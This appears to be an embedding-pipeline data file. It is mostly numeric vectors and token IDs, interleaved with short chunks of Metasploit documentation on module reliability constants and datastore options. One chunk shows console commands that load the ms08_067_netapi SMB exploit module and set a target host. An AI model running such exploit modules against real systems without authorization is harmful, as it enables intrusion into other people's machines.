-0.24453195929527283, -0.16494391858577728, -0.3109349310398102, -0.22418086230754852, -0.49802762269973755, -0.4315633475780487, 0.8774117827415466, 0.1597999483346939, -0.38755467534065247, -0.04037339240312576, 0.46706563234329224, -0.2807716429233551, 0.04679582640528679, -0.6131226420402527, -0.5381677746772766, 0.23709307610988617, 1.0793660879135132, 0.42934057116508484, 0.016509395092725754, -0.5902992486953735, -0.46378523111343384, 0.03403477743268013, 0.6545296311378479, 0.31036022305488586, 0.039869196712970734, 0.3809869587421417, 0.19325116276741028 ]
[ 101, 2047, 18804, 13102, 4135, 4183, 14184, 2024, 2085, 3223, 2000, 5383, 1037, 3964, 2930, 4820, 3176, 2592, 2107, 2004, 1996, 9211, 1010, 15258, 1998, 2217, 12879, 25969, 2015, 3378, 2007, 2770, 1996, 11336, 1012, 2742, 1024, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 3565, 1006, 10651, 1035, 18558, 1006, 18558, 1010, 1005, 2171, 1005, 1027, 1028, 1005, 11336, 2171, 1005, 1010, 1005, 6412, 1005, 1027, 1028, 1003, 1053, 1063, 11336, 6412, 1065, 1010, 1005, 3166, 1005, 1027, 1028, 1031, 1005, 3166, 2171, 1005, 1033, 1010, 1005, 6105, 1005, 1027, 1028, 5796, 2546, 1035, 6105, 1010, 1005, 7604, 1005, 1027, 1028, 1031, 1031, 1005, 26226, 2063, 1005, 1010, 1005, 12609, 1011, 22038, 20348, 1005, 1033, 1033, 1010, 1005, 19380, 13701, 1005, 1027, 1028, 1005, 12609, 1011, 6021, 1011, 2656, 1005, 1010, 1005, 4132, 1005, 1027, 1028, 1005, 10090, 1005, 1010, 1005, 7905, 1005, 1027, 1028, 7905, 1035, 10090, 1010, 1005, 21598, 1005, 1027, 1028, 6270, 1010, 1005, 7889, 1005, 1027, 1028, 1031, 1031, 1005, 6882, 1005, 1010, 1063, 1065, 1033, 1033, 1010, 1005, 12398, 7559, 18150, 1005, 1027, 1028, 1014, 1010, 1001, 2035, 2047, 14184, 2442, 5383, 1996, 2917, 2592, 1012, 2156, 2917, 2005, 2062, 4751, 2005, 3039, 5300, 1005, 3964, 1005, 1027, 1028, 1063, 1005, 9211, 1005, 1027, 1028, 1031, 1012, 1012, 1012, 1033, 1010, 1005, 15258, 1005, 1027, 1028, 1031, 1012, 1012, 1012, 1033, 1010, 1005, 2217, 12879, 25969, 2015, 1005, 1027, 1028, 1031, 1012, 1012, 1012, 1033, 1065, 1007, 1007, 2203, 3039, 5300, 9211, 8663, 12693, 2102, 6155, 23235, 3258, 26775, 11823, 1035, 3647, 5302, 8566, 2571, 2323, 2025, 5823, 1996, 2326, 2030, 9808, 26775, 11823, 1035, 2326, 1035, 23818, 25855, 8566, 2571, 2089, 5823, 1996, 2326, 1010, 2021, 2009, 2097, 23818, 26775, 11823, 1035, 2326, 1035, 2091, 5302, 8566, 2571, 2089, 5823, 1996, 2326, 1010, 1998, 3961, 2091, 26775, 11823, 1035, 9808, 1035, 23818, 25855, 8566, 2571, 2089, 5823, 1996, 9808, 1010, 2021, 2009, 2097, 23818, 26775, 11823, 1035, 9808, 1035, 2091, 5302, 8566, 2571, 2089, 5823, 1996, 9808, 1010, 1998, 3961, 12482, 2121, 7903, 2063, 1035, 7692, 1035, 3279, 5302, 8566, 2571, 5320, 1037, 7692, 2000, 2022, 20165, 2005, 1996, 2326, 2891, 1035, 7692, 1035, 3279, 5302, 8566, 2571, 5320, 1037, 7692, 2000, 2022, 20165, 2005, 1996, 9808, 2217, 3896, 8663, 12693, 2102, 6155, 23235, 3258, 8445, 10128, 18908, 2015, 1035, 2006, 1035, 9785, 5302, 8566, 2571, 3727, 1037, 18093, 1010, 1037, 4530, 4842, 1010, 4385, 1010, 2006, 1996, 4539, 3698, 8663, 8873, 2290, 1035, 3431, 5302, 8566, 2571, 16913, 14144, 2070, 9530, 8873, 2290, 5371, 3695, 2278, 1035, 1999, 1035, 15664, 5302, 8566, 2571, 3727, 2019, 17245, 1997, 12014, 1999, 1996, 8833, 1006, 1055, 1007, 4070, 1035, 5843, 12166, 5302, 8566, 2571, 2089, 3426, 2019, 4070, 2000, 5843, 21100, 24410, 1035, 3896, 5302, 8566, 2571, 3065, 2242, 2006, 1996, 3898, 2008, 1037, 2529, 2089, 5060, 23302, 1035, 3896, 5302, 8566, 2571, 2089, 3965, 3558, 3896, 1999, 8051, 1006, 4973, 1024, 2422, 1010, 2614, 1010, 2030, 3684, 1007, 5746, 1035, 3896, 5302, 8566, 2571, 2089, 3426, 1037, 5005, 1006, 4973, 1024, 5746, 6434, 2013, 1996 ]
metasploit
115.txt
0
speakers or hardware beeps ) reliabilityconstantdescriptionfirst _ attempt _ failthe module may fail for the first attemptrepeatable _ sessionthe module is expected to get a session every time it runsunreliable _ sessionthe module isn ’ t expected to get a shell reliably ( such as only once ) [SEP]
[ 0.26840466260910034, 0.3459853231906891, -0.058556172996759415, 0.44058945775032043, -0.6095308661460876, -0.6716828942298889, -0.24398860335350037, -0.4428044259548187, 0.2601606845855713, 1.2288482189178467, 0.7776759266853333, -0.26140496134757996, 0.4740317165851593, -0.15349753201007843, -0.9930040836334229, 0.32931551337242126, -0.2891544699668884, -0.3497263491153717, -0.7474915981292725, -0.20353107154369354, 0.41635817289352417, -0.1312604397535324, -1.015694499015808, -0.6263629198074341, -0.8410999178886414, 0.4763556122779846, 0.1686033308506012, 0.5043585896492004, 1.776187777519226, 1.118782639503479, 0.49363306164741516, 0.06366147845983505, 0.13360550999641418, -0.5331672430038452, 0.3846330940723419, -0.9965243935585022, 0.3977038562297821, -0.046919599175453186, -0.39331912994384766, -0.8404985666275024, -0.02336099185049534, 0.36875203251838684, 0.5704513788223267, -0.5838091969490051, -0.8179466724395752, -0.9289321899414062, -0.17933908104896545, 0.27765747904777527, 0.44131889939308167, -0.40215224027633667, 0.0219038687646389, 0.2675604224205017, -0.1620347797870636, -0.41576436161994934, -0.5795626640319824, -0.1386890858411789, -0.06969805061817169, -0.286132276058197, -0.7675679326057434, -0.11692772060632706, 0.6469674706459045, 0.27737292647361755, 0.5823832750320435, -0.8092609643936157, -0.07790282368659973, 0.6223191618919373, -0.33257246017456055, 0.3080480098724365, -0.5954920053482056, -0.27456721663475037, -0.013179460540413857, 0.8429009318351746, -0.7242051959037781, -0.9653717279434204, -0.3806802034378052, 0.28118857741355896, -0.1417405605316162, 0.2704765498638153, -0.6738802194595337, 0.944638192653656, 0.3154655992984772, 1.0790976285934448, 0.27975305914878845, -0.07318457961082458, -0.6067861914634705, -0.25493788719177246, 0.1580899953842163, -0.17078369855880737, -0.4431774914264679, -0.34062260389328003, -0.0431584008038044, 0.6377684473991394, -0.9106844663619995, 0.5439501404762268, 0.2121933251619339, 0.23197586834430695, -1.053112506866455, 0.3127555847167969, -0.1606958955526352, -0.561191737651825, 0.12403661757707596, 1.060293197631836, 0.1795971542596817, 0.10617637634277344, -0.7822700142860413, -0.16511861979961395, 1.0476881265640259, 0.5414844751358032, -1.1280168294906616, -0.3162800073623657, 0.2711896598339081, 0.23140215873718262, -0.014091330580413342, -0.3099885582923889, -0.08349334448575974, 0.5261763334274292, -0.006299952045083046, -0.36309027671813965, -0.6446491479873657, -0.07871755212545395, 0.4771087169647217, 0.12872502207756042, 0.7428553104400635, -0.6523851156234741, 0.3336217701435089, 0.03614139184355736, 0.353257954120636, 1.2244068384170532, 0.13392795622348785, -0.45275455713272095, -0.4682413637638092, 0.40363290905952454, 0.6236324310302734, 0.3019486665725708, -0.15061387419700623, -0.17913112044334412, 0.623527467250824, 0.01192532479763031, -0.09964122623205185, -0.4499037265777588, 0.019787533208727837, 0.6002846360206604, 0.3587811291217804, 1.47842276096344, -0.7370249032974243, 0.2918604910373688, 0.4391588270664215, -0.18317484855651855, -0.5196009278297424, 0.5437955856323242, 0.2846750319004059, -0.1915905624628067, 0.17801713943481445, -0.1044783815741539, 0.23493488132953644, -0.3061302602291107, -0.24873216450214386, -0.1813344806432724, -0.06989786773920059, 0.5547246932983398, 0.10693567246198654, 0.5411937832832336, -1.058885097503662, 0.22706247866153717, -0.38662073016166687, 0.6840404272079468, -0.03270538151264191, -0.31489676237106323, 0.12824313342571259, -0.4903087615966797, 0.37640634179115295, 0.4499140679836273, -0.334686279296875, 0.04441313073039055, 1.0058377981185913, 0.3128415644168854, 0.3567318022251129, 0.42245033383369446, 0.6178420186042786, 0.5580299496650696, -0.7836481332778931, 0.11701665073633194, 1.0621801614761353, 0.29757755994796753, 0.8366296887397766, -0.04167748987674713, 0.14652740955352783, -0.18485121428966522, -0.5289409756660461, -0.47854533791542053, -0.03584589064121246, 0.15708065032958984, -0.6136837601661682, 0.6016815304756165, 0.25444868206977844, -0.4060918092727661, -0.22420433163642883, 0.04328492656350136, -0.14843538403511047, -0.9897865056991577, -0.8019314408302307, 0.08998019993305206, -0.26749950647354126, 0.27086448669433594, 0.051930319517850876, -0.8864314556121826, 0.6256891489028931, 0.3959292769432068, 0.29622378945350647, 0.1678350269794464, -0.4755358099937439, -0.01149148028343916, -0.5730302333831787, 0.02197260595858097, 0.6339178085327148, -0.7371596097946167, -0.03539057448506355, 0.23517964780330658, 0.5876559615135193, 0.7141841053962708, -0.5638812184333801, 0.1080474853515625, 0.0830938071012497, 0.4632238745689392, -0.627600908279419, -0.37769895792007446, -0.15159928798675537, 0.5377624034881592, 0.44127002358436584, 0.48827889561653137, -0.22925423085689545, 0.29728633165359497, -0.12846407294273376, 1.057693600654602, 0.23621542751789093, -0.3732914626598358, 1.0375287532806396, 0.8477190732955933, 0.010153237730264664, 0.18675924837589264, -0.5652519464492798, 0.6752226948738098, 0.5113105177879333, 0.15041306614875793, 0.39609143137931824, 0.18418072164058685, 0.27939164638519287, -0.12059736996889114, 0.4055412709712982, 0.09762347489595413, -0.06890236586332321, 1.4306031465530396, 1.1351301670074463, -0.49015164375305176, -0.42238712310791016, -0.8915483355522156, 0.08552614599466324, 0.4856055676937103, -1.2308127880096436, 0.2542037069797516, -0.1279497593641281, -0.06597042083740234, -0.7563097476959229, 0.22427086532115936, 0.14246734976768494, 0.0481271855533123, 0.19766701757907867, -0.03835716471076012, -0.04557228088378906, 0.02693038433790207, -0.9381781816482544, -0.25933364033699036, -0.6282652616500854, -0.07178929448127747, -0.8005791902542114, -0.04689407721161842, 0.6417539715766907, -0.562926709651947, 1.3022119998931885, -0.27620378136634827, -0.21317158639431, 0.5474414825439453, 0.6430351138114929, 0.8375334143638611, 0.23170554637908936, -0.01960187591612339, -0.8735602498054504, 0.2679714262485504, -0.22366589307785034, 0.3852806091308594, -0.49384453892707825, -0.16606958210468292, 0.04201768711209297, 0.18899273872375488, 0.8048487305641174, -0.213622584939003, 0.07207124680280685, 0.4004911184310913, -0.535090446472168, 0.04705663397908211, 0.019363215193152428, -0.57264244556427, 0.18308888375759125, -0.5392707586288452, -0.5543162822723389, 0.35080236196517944, 0.20219539105892181, -0.5581676959991455, 0.6135572791099548, 0.9776037335395813, -0.7421579360961914, 0.8383023142814636, -0.4022883176803589, -0.014895142987370491, -1.0048435926437378, 0.8202517032623291, 0.2671254873275757, -0.46633437275886536, -0.026952214539051056, -0.2818150222301483, 0.2178477644920349, -0.49479255080223083, 0.0197271928191185, 0.040158551186323166, -0.2456415444612503, 0.5151804685592651, 0.039129357784986496, -1.0227407217025757, 0.9123989343643188, -1.5069555044174194, -0.08129719644784927, -0.20634472370147705, 0.23784801363945007, 0.569702684879303, 0.08439541608095169, 1.0305835008621216, -0.21232293546199799, 0.014973214827477932, -0.7308164238929749, 0.6131789088249207, 0.12610457837581635, -0.29738152027130127, -0.2833801209926605, 0.6529576778411865, -0.4271692633628845, 0.12417832016944885, 0.4744698405265808, -0.5402756929397583, -0.15012294054031372, 0.1302754133939743, 0.08801834285259247, 0.08111244440078735, 0.6719107627868652, -0.34843388199806213, 0.14968113601207733, 0.8791476488113403, -0.45926499366760254, -0.45711418986320496, 0.5320781469345093, 0.7488384246826172, 0.09337595105171204, 0.35266703367233276, 0.412800669670105, 0.7668293714523315, -0.09155373275279999, 0.019739119336009026, 0.12779998779296875, 0.604859471321106, 1.001131534576416, -0.011333288624882698, 0.41759681701660156, -1.0476223230361938, -0.9389355778694153, 0.5091637372970581, 0.08660997450351715, -0.5288102626800537, 0.590690553188324, -0.12912021577358246, 0.8228750228881836, -0.2092101275920868, -0.07841554284095764, 0.3886411786079407, -0.20671264827251434, 0.2613440454006195, -0.6003546118736267, -0.20092393457889557, -0.08002715557813644, -0.47802063822746277, -0.49326708912849426, -0.282079815864563, -0.34394627809524536, -0.6522663235664368, 0.1956809163093567, -0.9185864329338074, -0.056361809372901917, -0.9301542043685913, 0.226863294839859, 0.28566473722457886, -0.016115229576826096, 0.719393789768219, 0.036388054490089417, -0.3668785095214844, 0.2635098397731781, -0.3011687099933624, -0.1224006935954094, -0.018452703952789307, -0.8793444037437439, 1.1310551166534424, -0.84943026304245, -0.49407079815864563, -0.810813307762146, 0.13518932461738586, -0.24202211201190948, 0.18661314249038696, 0.10685601085424423, -0.18664970993995667, -0.009899788536131382, 0.5889884233474731, 0.41752293705940247, -0.2816581130027771, -0.137852281332016, -1.2115497589111328, -0.16542834043502808, 0.7569181323051453, -0.02207138016819954, -0.8672797083854675, -0.04255659505724907, 0.2042752504348755, 0.7732634544372559, 0.6088937520980835, -0.23416782915592194, -0.5080344676971436, -0.44429245591163635, -0.6232576370239258, -0.9936270117759705, -0.013791574165225029, 0.8868779540061951, -0.4553409218788147, 0.7214860320091248, -0.5232759118080139, 0.564756453037262, 0.4867139458656311, -0.7741686105728149, -0.6878186464309692, -0.10683298110961914, 0.10022543370723724, 0.21085214614868164, -0.06761246174573898, 0.5246627926826477, -0.47693246603012085, 0.07292118668556213, -0.8944029211997986, 0.387332946062088, -1.5196579694747925, 0.13919697701931, -0.12444605678319931, 0.5746374130249023, 0.18609699606895447, -0.02654041349887848, -0.6729515194892883, 0.110587477684021, -0.6079949140548706, -0.09199555963277817, -0.3953218460083008, -0.09607280045747757, 0.42650771141052246, -0.37589091062545776, -0.32821500301361084, 0.7160331010818481, 0.7697156071662903, 0.15235845744609833, 0.4139934778213501, -0.0598207525908947, -0.09913551062345505, 0.3787872791290283, -0.21174578368663788, 0.21757349371910095, 0.07948218286037445, -0.36751827597618103, -0.10779351741075516, -0.7959301471710205, 0.7598776817321777, 0.4879167973995209, -0.16546809673309326, -0.4289786219596863, -1.2672313451766968, -0.13121871650218964, -0.3482531011104584, -0.15939833223819733, 0.9635350704193115, -0.5769781470298767, 0.41763752698898315, 0.31420332193374634, -0.5969064235687256, -0.3062480092048645, -0.17935258150100708, -0.5288209915161133, -0.13838140666484833, 0.24039843678474426, 0.3490571975708008, 0.0460713729262352, -0.34080347418785095, -0.6799077391624451, 0.3619505763053894, -0.3203374743461609, 0.03337094932794571, -0.33462968468666077, -0.22022056579589844, 0.806759774684906, 0.0994519293308258, -0.8971567749977112, 0.15787969529628754, 0.16083429753780365, 0.2645054757595062, 0.37395578622817993, -0.28984150290489197, -0.06989529728889465, -0.22719714045524597, 0.34586164355278015, 0.679975152015686, 0.5147877335548401, -1.218196988105774, -0.4789700508117676, 0.17909790575504303, -0.7819746732711792, 0.6371217966079712, 0.13897079229354858, -0.7459858655929565, 0.09298842400312424, -0.9421555399894714, -0.021619688719511032, -0.6138293147087097, -0.2938607633113861, -0.5642132759094238, 0.19608448445796967, -0.544566810131073, -0.244100883603096, 0.7969546914100647, -0.7472794055938721, -0.3771367073059082, -0.06303641200065613, 0.25846678018569946, -0.14234234392642975, -0.8749614357948303, 0.22838188707828522, 0.48010361194610596, -0.7358423471450806, 1.2408387660980225, 0.1763574481010437, -0.28691229224205017, -0.16168370842933655, 0.6371853947639465, 0.004551402758806944, 0.78146892786026, -0.051620252430438995, -0.4178919196128845, -0.14190590381622314, 0.46923407912254333, 0.21309681236743927, 0.6016391515731812, -0.021701909601688385, 0.08468834310770035, -0.47867918014526367, 0.6235313415527344, -0.6398255228996277, 0.1322285383939743, -0.14605753123760223, 0.7653284668922424, 0.8884685039520264, -0.2773034870624542, 0.2224016934633255, -0.2734973132610321, 0.3478565514087677, 0.069758340716362, 0.47177860140800476, -0.8135082125663757, 0.0019760248251259327, -0.4341065585613251, -0.718741238117218, 0.1657799482345581, 0.25117093324661255, 0.361500084400177, 0.02554902620613575, -0.2735649049282074, -0.055583834648132324, -0.6086159944534302, 0.3097243010997772, 1.2277047634124756, -0.22196587920188904, -0.07207693159580231, -1.3156814575195312, 0.5694478750228882, 0.8950639367103577, -0.43225571513175964, -0.3580106198787689, 0.01660664565861225, -0.24160504341125488, -0.162899911403656, -0.43832913041114807, -0.48272082209587097, -0.8127198815345764, -0.3286915123462677, 0.4428243041038513, 0.17635780572891235, 0.036786098033189774, -0.35239771008491516, -0.7364709377288818, -0.6165326237678528, 0.6932556629180908, 0.7769896388053894, -0.217790424823761, 0.5887153148651123, 0.17543645203113556, -0.22571812570095062, -0.2718021869659424, -0.7252568006515503, -0.07230385392904282, -0.27937695384025574, 0.327232301235199, 0.2697851061820984, -0.1689777672290802, 0.8251415491104126, 0.30245018005371094, -0.2518819570541382, -0.6775857210159302, -0.738722026348114, -0.3405631184577942, -0.5373754501342773, -0.9196560382843018, -0.5610823631286621, -0.12941469252109528, 0.8255425095558167, 0.057733647525310516, 0.14508719742298126, -0.225141242146492, 0.7091403603553772, -0.24243387579917908, -0.2961188554763794, -0.5279435515403748, 0.5821680426597595, 0.3907735347747803, 0.17561842501163483, -0.0518508180975914, -0.6603983044624329, 0.19095350801944733, -0.42424476146698, -0.6884987354278564, 0.4770160913467407, 0.19845713675022125, -0.2670872211456299, 0.15366578102111816, -0.35764575004577637, 0.9204584956169128, -0.20784159004688263, 0.5687122344970703, -0.09928493201732635, -0.860732913017273, -0.6753393411636353, -0.058034107089042664, -0.2903255224227905, -0.3110979497432709, 0.31007543206214905, -0.5796469449996948, 0.022495383396744728, -0.22497226297855377, 0.13311582803726196, 0.6738805174827576, -0.8004215955734253, -0.15357133746147156, -1.0309332609176636, -0.18018797039985657, -0.3681202828884125, -0.14881187677383423, 0.3362412452697754, -0.636077880859375, -0.22142557799816132, -0.11740925163030624, -0.7248324155807495, -0.0039409757591784, -0.34937742352485657, -0.3845004439353943, -0.8647269606590271, 0.04355935752391815, -0.8296942710876465, -0.8354430794715881, -0.8230753540992737, 0.3419879674911499, -0.14581166207790375, 0.19879648089408875, -0.2542070150375366, -0.4806972146034241, -0.8097963929176331, 1.4823200702667236, -0.5660585165023804, -0.2058328539133072, -0.0561450719833374, 0.1839534044265747, 0.4746819734573364, -0.0577666237950325, -0.8861309289932251, 0.8483777046203613, -0.033306460827589035, -0.495132714509964, 0.6100171208381653, -0.887935996055603, 0.09865882247686386, 0.5572692155838013, -1.0684788227081299, 0.40688544511795044, -0.4202612340450287, -1.2244927883148193, 0.5588503479957581, 0.8782126307487488, -0.9642029404640198, 0.6732890605926514, -0.3102773427963257, -0.13940051198005676, 0.08230907469987869, 0.6431050896644592, -0.06370923668146133, 0.4844377338886261, 0.2585884630680084, 0.8498630523681641, 0.7615392804145813, 0.012405190616846085, 0.9835695624351501, 0.4944503903388977, 0.43330147862434387, 0.5435916185379028, -0.3496411442756653, -0.33004847168922424, 0.25424307584762573, -0.07553502172231674, 0.08966446667909622, 0.3025919497013092, -0.18573689460754395, 0.3131575882434845, -0.06578464806079865, -0.08785887807607651, 0.1327645480632782, -0.1859607845544815, 0.8426369428634644, -0.3790517747402191, -0.1127583310008049, -0.249983549118042, -0.2450709491968155, -0.11624317616224289, -1.406807780265808, 0.01984906569123268, 0.004428160842508078, -0.5577055811882019, -0.21936458349227905, -0.4450128674507141, -0.32960769534111023, 0.5663242936134338, -0.12884803116321564, 0.046539001166820526, -0.25639376044273376, 0.44280925393104553, 0.32837504148483276, 0.6081036925315857, -0.8665508031845093, 0.7719114422798157, 0.0860702320933342, 0.7218503355979919, -0.1534404307603836, -0.8694700598716736, 0.6684414148330688, 1.3536134958267212, 0.07218189537525177, -0.39712145924568176, -1.0422923564910889, 0.523369550704956, 0.37127017974853516, -0.07626760751008987, -0.347012996673584, 0.34814903140068054, -0.36338046193122864, 1.1699039936065674, -0.29006287455558777, 0.6265522241592407, -0.10004206001758575, -0.16611692309379578, 0.11435611546039581, -0.03426168113946915, -1.0837980508804321, -0.02030615694820881, 0.2607659101486206, -0.3146268129348755, 0.6204309463500977, 0.7808528542518616, 0.5249250531196594, 0.11486871540546417, 0.502559244632721, 0.0015896657714620233, 0.14674846827983856, 1.0868840217590332, 0.7449207305908203, -0.0025977829936891794, 0.6388341188430786, 0.8172082304954529, -0.941449761390686, -0.480431467294693, 1.2088148593902588, 0.38074979186058044, -0.6405191421508789, 0.5606004595756531, -0.5054818391799927, 0.7488610148429871, -0.4401170611381531, -0.2968928813934326, 0.3244132399559021, -0.3060080409049988, 0.943896472454071, 0.3677249550819397, 0.22820012271404266, 1.0479789972305298, -0.9234322905540466, -0.15555767714977264, -0.4277268350124359, -0.24425438046455383, 1.2596598863601685, 0.5305941104888916, -0.2628597617149353, -0.5328934788703918, 0.7957048416137695, 0.7605107426643372, -0.040562164038419724, 0.16022489964962006, -0.12009786069393158, 0.1309865266084671, -0.5083449482917786, 0.9362311959266663, 0.33152851462364197, 0.25084519386291504, -0.21466238796710968, -0.11163950711488724, -0.9626266360282898, 0.2192334234714508, 0.5735062956809998, -0.5561647415161133, 0.04818813130259514, -0.21313545107841492, 1.1870988607406616, -0.7704818248748779, -0.016932174563407898, -0.8901336193084717, -0.1828315556049347, 0.2861461937427521, 0.05273379012942314, -0.6164867281913757, 0.11748942732810974, 0.3730529546737671, 0.10542889684438705, 0.6193968057632446, 1.2598856687545776, -0.6682454347610474, 1.1147289276123047, 0.5259438157081604, -0.5431088209152222, -0.40800920128822327, 0.21914291381835938, -0.8147032856941223, -0.37356817722320557, 0.03884490951895714, -0.08702352643013, 1.0455958843231201, -0.12122973054647446, -1.031449794769287, -0.187048077583313, 0.46062958240509033, -0.2745033800601959, -0.875828206539154, -0.2038564383983612, 0.41498515009880066, -0.8219298124313354, 0.13175611197948456, 0.6162359118461609, 0.808742880821228, 0.42669862508773804, -0.28198692202568054, -1.0275534391403198, -0.2653428614139557, 0.8508093953132629, -0.2720259130001068, 0.18941853940486908, -0.31864142417907715, -0.9772787690162659, 0.15782701969146729, -1.154391884803772, -0.1777542680501938, -0.01966618001461029, -0.3181017339229584, 0.1650978922843933, 0.03166703134775162, 0.3578091561794281, 0.4856104552745819, 0.1488945484161377, -0.5702788829803467, 0.29156094789505005, 0.2247900515794754, 0.8819605112075806, -0.5008412003517151, 0.03556482493877411, -0.16348865628242493, -0.07970087230205536, -0.3103215992450714, -0.8340426087379456, 0.7139147520065308, -0.12163683772087097, -0.4831867218017578, -0.04284985736012459, 0.11823320388793945, -0.6778895258903503, -0.06742823868989944, 0.06765734404325485, 0.4285135269165039, 0.17595745623111725, -0.28867948055267334, -1.0406638383865356, -0.3084329664707184, -1.2267345190048218, 0.31687816977500916, -0.445362389087677, 0.5941305756568909, -0.4676780104637146, -0.41724300384521484, -0.8411444425582886, -1.0955919027328491, 3.9747743606567383, 1.5860191583633423, 0.6775384545326233, -0.32933565974235535, 0.4423508048057556, 0.4859172999858856, 0.24902880191802979, -0.2192104160785675, -0.07815921306610107, -0.6164137721061707, 0.12420666217803955, 0.14486254751682281, 0.038899071514606476, 0.8078689575195312, -0.012480052188038826, 0.40507206320762634, -0.6740223169326782, 0.16801172494888306, 0.4604460597038269, -0.8041515946388245, -0.27750685811042786, -0.22740158438682556, -0.1490841954946518, 1.1686509847640991, -0.6098884344100952, 0.44032520055770874, -0.0029991779010742903, -0.31631413102149963, 0.33379247784614563, -0.598341703414917, 0.18040336668491364, -0.4802784025669098, 0.48516446352005005, -0.5740094184875488, 0.0955020934343338, 0.23729845881462097, 0.02476850524544716, -0.41706448793411255, 0.4049372375011444, -0.3128729462623596, 0.6522038578987122, -0.6153660416603088, -0.025536617264151573, -0.29899880290031433, -0.43196773529052734, 0.6959296464920044, -0.08292746543884277, 0.3648151159286499, 1.3238451480865479, -0.8449071645736694, 0.6461832523345947, -0.2864684462547302, 0.5706713795661926, -0.43536049127578735, -0.9373452663421631, -0.28698334097862244, -0.5961227416992188, -0.8284032344818115, 0.021945085376501083, -0.21583996713161469, 0.24417977035045624, -0.3045189678668976, -0.571372926235199, 0.38424092531204224, 0.44312021136283875, 1.242512822151184, -0.08561335504055023, -0.20897658169269562, -0.3508155345916748, -0.4315732419490814, 0.44097644090652466, 0.14197856187820435, -0.11389874666929245, -0.4554666578769684, 0.7162474393844604, 0.6197462677955627, 0.6724390983581543, 0.4810125231742859, 0.5215336084365845, -0.3183090090751648, 0.12444718182086945, -0.2357601374387741, 0.34949401021003723, -0.012789475731551647, 0.20319658517837524, 0.534800112247467, -0.5765959620475769, -0.11828949302434921, -0.8625930547714233, 0.5375531911849976, 0.8116539120674133, 0.8390323519706726, -0.24442888796329498, 0.36693304777145386, -0.8775063157081604 ]
[ 7492, 2030, 8051, 10506, 4523, 1007, 15258, 8663, 12693, 2102, 6155, 23235, 3258, 8873, 12096, 1035, 3535, 1035, 8246, 10760, 11336, 2089, 8246, 2005, 1996, 2034, 3535, 2890, 5051, 27892, 1035, 5219, 10760, 11336, 2003, 3517, 2000, 2131, 1037, 5219, 2296, 2051, 2009, 3216, 4609, 16570, 19210, 1035, 5219, 10760, 11336, 3475, 1521, 1056, 3517, 2000, 2131, 1037, 5806, 2128, 6632, 6321, 1006, 2107, 2004, 2069, 2320, 1007, 102 ]
metasploit
115.txt
1
[CLS] datastore option overviewa datastore option is a type of variable that can be set by the user, allowing various components of metasploit to be more configurable during use. for example, in msfconsole, you can set the consolelogging option in order to log all the console input / output - something that ’ s kind of handy for documentation purposes during a pentest. when you load a module, there will be a lot more options registered by the mixin ( s ) or the module. some common ones include rhosts and rport for a server - side exploit or auxiliary module, srvhost for a client - side module, etc. the best way to find out exactly what datastore options you can set is by using these commands : show options - shows you all the basic options. show advanced - shows you all the advanced options. show missing - shows you all the required options you have not configured. set - shows you everything. obviously, you also use this command to set an option. option sources : moduledatastore, active _ module, session, and framework how users look at datastore optionson the user ’ s side, datastore options are seen as global or module - level : global means all the modules can use that option, which can be set by using the setg command. module - level means only that particular module you ’ re using remembers that datastore option, no other components will know about it. you are setting a module - level option if you load a module first, and then use the set command, like the following : msf > use exploit / windows / smb / ms08 _ 067 _ netapi msf exploit ( ms08 _ 067 _ netapi ) > set rhost 10. 0. 1. 3 rhost = > 10. 0. 1. 3 how metasploit developers look at datastore optionson the development side, things are a little crazier. datastore options actually can be found in at least four different sources : the moduledatastore object, active _ module, session object, or the framework object. if you ’ re just doing module development, the best source you can trust is the moduledatastore object. this object has a specific load order before handing you the option you want : if the option can be found in the module ’ s datastore, it will give you that.
[ -0.25460076332092285, -0.5105100870132446, 0.025822918862104416, 0.38743576407432556, -1.1167770624160767, -0.4977279603481293, 0.1540898084640503, 0.11780703067779541, -0.14851176738739014, 0.46085670590400696, 0.2759059965610504, -0.10390225797891617, 0.6554450392723083, -0.206195667386055, -0.3197520673274994, 0.0987614169716835, -0.3692590296268463, -0.1586325317621231, -1.2830923795700073, -0.038361936807632446, 0.4961470067501068, -0.3802698850631714, -0.551099419593811, -0.8937634229660034, -0.948823094367981, 0.2870352268218994, 0.26967114210128784, 0.08896218240261078, 0.8504645228385925, 0.7298243641853333, 0.26066523790359497, 0.2097286880016327, 0.1294800043106079, -0.1993134319782257, 0.4355461001396179, 0.14447081089019775, 0.3720305562019348, -0.17162878811359406, 0.11523551493883133, -0.9990599155426025, 0.5975185036659241, -0.5814440846443176, -0.08683009445667267, -0.4813133776187897, -0.20962682366371155, -0.4158281087875366, -0.23960770666599274, -0.06671780347824097, 0.6587590575218201, -0.16985103487968445, 0.3213256597518921, 0.0666070505976677, 0.43383392691612244, 0.43613186478614807, -0.05127293989062309, -0.07704277336597443, 0.0022754378151148558, 0.30907484889030457, -0.24194075167179108, -0.16780880093574524, -0.2818545997142792, 0.11449941247701645, 0.0012240682262927294, -0.6844462156295776, 0.4255385100841522, -0.17300736904144287, 0.17681746184825897, -0.48036548495292664, -0.42139574885368347, -0.2479013353586197, 0.30821743607521057, 0.3650117516517639, -0.5542985200881958, -0.7107606530189514, -0.08743025362491608, 0.1942259669303894, 0.3220566511154175, -0.31878915429115295, -0.2900220453739166, 0.4651484191417694, 0.2682923972606659, 0.4715132415294647, 0.5361140966415405, -0.48770982027053833, -0.353997141122818, -0.1337125450372696, 1.0091664791107178, 0.6455057859420776, -0.9690654277801514, 0.49412861466407776, 0.17967548966407776, 0.49260732531547546, -0.32645073533058167, -0.07739311456680298, 0.7142346501350403, 0.7058851718902588, 0.13957035541534424, 0.05610732361674309, 0.21283778548240662, -0.19322282075881958, 0.44910937547683716, 0.49168798327445984, 0.7994231581687927, -0.06338091939687729, 0.0781426727771759, 0.6721485257148743, 0.09306229650974274, 0.2964455783367157, -0.1812281608581543, 0.07594140619039536, 0.5480915904045105, -0.3131599724292755, 0.41939377784729004, -1.0048646926879883, -0.4288948178291321, 0.6454188823699951, 0.15886782109737396, -0.30626967549324036, -0.6752476692199707, 0.9405181407928467, 0.08962943404912949, -0.38859593868255615, 0.16708602011203766, -0.1253572404384613, 0.1547248214483261, 0.07678232342004776, 0.3342459797859192, 0.040531225502491, -0.7257344126701355, -1.279767632484436, -0.3831745982170105, 0.07019058614969254, 0.5457103848457336, 0.9860227108001709, 0.4038839340209961, 0.36120855808258057, 0.04548819363117218, 0.5644671320915222, 0.26608920097351074, -0.9287251234054565, 0.19402487576007843, 0.8614228963851929, 0.03515074402093887, 1.0546858310699463, -0.07948414981365204, 